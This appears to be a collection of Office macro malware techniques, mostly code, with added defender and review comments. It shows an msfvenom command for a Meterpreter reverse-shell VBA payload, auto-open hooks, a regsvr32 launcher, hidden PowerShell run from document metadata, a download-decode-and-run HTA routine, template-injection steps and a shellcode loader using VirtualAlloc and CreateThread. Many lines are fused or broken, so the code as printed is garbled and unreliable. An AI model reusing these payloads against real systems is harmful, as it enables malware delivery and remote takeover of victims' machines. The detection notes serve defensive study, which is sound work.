└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -e x86/shikata_ga_nai -f vba-psh > vba
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of vba-psh file: 7590 bytes
' Module-level run-once flag: Launch() below exits early when this is already True
' and sets it on the first pass.
Public alreadyLaunched As Integer
Private Sub Malware()' Payload slot of the msfvenom "vba-psh" template.
' ============================================
' Enter your malware code here. It will be started on auto-open.
' ============================================
' In this listing the slot holds only a MsgBox, so the routine as shown is inert.
' The 7590-byte file size reported above suggests the generated file carries more
' than is visible here; when auditing a document, this slot is where a launcher
' would sit.
MsgBox ("Here comes the malware!")
' ============================================
End Sub
Private Sub Launch()If alreadyLaunched = True Then
' Run-once guard on the module-level alreadyLaunched flag: a second call exits here.
' NOTE(review): the Sub header and the If are fused onto one line and the If block has
' no End If in this listing, so the text as printed is not valid VBA -- presumably a
' paste artifact. Anything the template ran after setting the flag is not visible here.
Exit Sub
alreadyLaunched = True
End Sub
Private Sub SubstitutePage()' Replace the visible document body with a prepared AutoText entry.
' This routine will take the entire Document's contents,
' delete them and insert in their place contents defined in
' INSERT -> Quick Parts -> AutoText -> named as in `autoTextTemplateName`
' Defender note: after macros run, what the user sees is the AutoText pulled from the
' attached template, not the body stored in the document. When triaging such a file,
' inspect the attached template's AutoText entries as well as the document body.
Dim doc As Word.Document
' firstPageRange is assigned below but never read.
Dim firstPageRange As Range
Dim rng As Range
Dim autoTextTemplateName As String
' This is the name of the defined AutoText prepared in the document,
' to be inserted in place of previous contents.
autoTextTemplateName = "这是一个图文集"Set firstPageRange = Word.ActiveDocument.Range
' NOTE(review): the assignment and the Set above are fused onto one line in this listing.
' Deletes a single character at the current selection before the swap.
Selection.Delete Unit:=wdCharacter, Count:=1
Set doc = ActiveDocument
' Target range is the whole first section; the AutoText entry is inserted over it
' (the True argument requests the rich-text form of the entry). If the attached
' template has no entry of that name this line presumably raises a runtime error.
Set rng = doc.Sections(1).Range
doc.AttachedTemplate.AutoTextEntries(autoTextTemplateName).Insert rng, True
End Sub
Sub AutoOpen()' Becomes launched as first on MS Word
' Word auto-execution entry point; empty in this listing. A second, Private,
' AutoOpen is declared further down, which is a duplicate definition.
' Defender note: these auto-execution procedure names (AutoOpen, Document_Open,
' Auto_Open, Workbook_Open) are what static macro scanners key on first.
End Sub
Sub Document_Open()
' Becomes launched as second, another try, on MS Word
' Word document-open event hook, empty here; declared again as Private below,
' which is a duplicate definition in the same module.
End Sub
Sub Auto_Open()' Becomes launched as first on MS Excel
' Excel auto-execution entry point, empty here; a Private duplicate appears below.
End Sub
Sub Workbook_Open()
' Becomes launched as second, another try, on MS Excel
' Excel workbook-open event hook, empty here; a Private Workbook_Open with a real
' body appears further down, so this listing holds two definitions of the name.
End Sub
Private Sub Document_Open()
' Empty; duplicates the public Document_Open declared earlier in this listing.
End Sub
Private Sub DocumentOpen()
' Empty. Spelling variant of Document_Open without the underscore; whether Word
' treats it as an event hook is not established by anything on this page.
End Sub
Private Sub Auto_Open()
' Empty; duplicates the public Auto_Open declared earlier in this listing.
End Sub
Private Sub AutoOpen()
' Empty; duplicates the public AutoOpen declared earlier in this listing.
End Sub
Private Sub Auto_Exec()
' Empty. Word's startup hook is spelled AutoExec; whether this underscored form is
' ever invoked is not something this page demonstrates.
End Sub
Private Sub Test()
' Runs regsvr32 against scrobj.dll with /u /n /s and an /i: argument that is blank in
' this listing. Run(..., 0, False): window style 0 hides the window and False means
' the macro does not wait for the process to exit.
' Defender note: an Office process spawning regsvr32 with scrobj.dll is a widely
' signatured parent/child pair; alerting on that pairing catches this routine
' regardless of what the /i: argument contains.
' NOTE(review): End Sub is fused onto the Run line in this listing.
Dim shell
Dim out
Set shell = VBA.CreateObject("WScript.Shell")
out = shell.Run("regsvr32 /u /n /s /i: scrobj.dll", 0, False)End Sub
Private Sub Workbook_Open()
' Excel open hook (second definition of the name in this listing). Reads the
' workbook's "Author" built-in document property and writes it to the stdin of a
' hidden powershell started with "-Command -" (commands taken from stdin), followed
' by a blank line -- so the script text lives in file metadata, not in the macro.
' Defender note: scanners that only read VBA source miss the payload here; the
' BuiltinDocumentProperties read combined with a hidden "powershell -Command -"
' child is the indicator, and the document's Author field is the artifact to pull.
' NOTE(review): the With line folds a .WriteLine call into the With object
' expression; as printed it does not look like valid VBA and may have been mangled.
Dim author As String
author = ActiveWorkbook.BuiltinDocumentProperties("Author")
Dim ws As Object
Set ws = CreateObject("WScript.Shell")
With ws.Exec("powershell.exe -nop -WindowStyle hidden -Command -").StdIn.WriteLine author
.StdIn.WriteBlankLines 1
End With
End Sub
Sub DownloadAndExec()
' Fetches an HTTP body (the URL is blank in this listing), writes it as binary
' (Stream Type 1) to encoded.crt -- relative to the process's working directory,
' SaveOptions 2 = overwrite -- then shells out so certutil decodes it to encoded.hta
' and start launches the HTA.
' Defender note: "certutil -decode" and an .hta launched via a cmd.exe child of an
' Office process are both common detection points; the dropped file names here are
' fixed (encoded.crt / encoded.hta), which makes the disk artifacts easy to hunt.
' NOTE(review): End Sub is fused onto the Shell line in this listing.
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET","", False
With bStrm
.Type = 1
.write xHttp.responseBody
.savetofile "encoded.crt", 2
End With
Shell ("cmd /c certutil -decode encoded.crt encoded.hta & start encoded.hta")End Sub
制作模板注入只需要将当前Word文档重命名为.zip后缀并解压,然后进入到word目录下的_rels目录,打开document.xml.rels文件并找到一个空闲的 Id 值,例如 rId10,然后在 Relationships 标签内添加一个新的 Relationship 标签即可:
' Win32 imports for an in-process shellcode loader: allocate memory, copy bytes into
' it, start a thread at it. PtrSafe/LongPtr mark this as 64-bit-capable VBA7 syntax.
' Defender note: these three Declares together (VirtualAlloc, RtlMoveMemory,
' CreateThread) are a strong static indicator on their own, independent of the
' payload bytes that follow.
' NOTE(review): each Declare is wrapped across physical lines by the page, so the
' text is not valid VBA as printed; the ThreadParameter argument has no ByVal and is
' therefore passed by reference, unlike the other parameters.
Private Declare PtrSafe Function CreateThread Lib "KERNEL32"(ByVal SecurityAttributes
As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As
LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32"(ByVal lpAddress As
LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As
Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32"(ByVal lDestination As
LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Function MyMacro()
' Copies a byte array into freshly allocated executable memory and runs it on a
' new thread. Returns nothing meaningful; res only holds the last API result.
' Defender note: VirtualAlloc with flProtect &H40 (PAGE_EXECUTE_READWRITE) followed
' by CreateThread from an Office process is the classic loader pattern; behavioral
' detection on the RWX allocation plus thread start catches it whatever the bytes are.
Dim buf As Variant
Dim addr As LongPtr
Dim counter As Long
Dim data As Long
Dim res As Long
' Placeholder: this page does not include the actual byte array.
buf = Array(shellcode array)
' &H3000 = MEM_COMMIT | MEM_RESERVE, &H40 = PAGE_EXECUTE_READWRITE. The loop moves
' the low byte of each array element into the allocation, one byte per call.
' NOTE(review): three statements are fused onto the VirtualAlloc line in this listing.
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)For counter = LBound(buf) To UBound(buf)data = buf(counter)
res = RtlMoveMemory(addr + counter,data, 1)
Next counter
' Starts a thread at the allocation. NOTE(review): End Function is printed as
' "EndFunction" here, so the routine is not compilable as shown.
res = CreateThread(0, 0, addr, 0, 0, 0)EndFunction
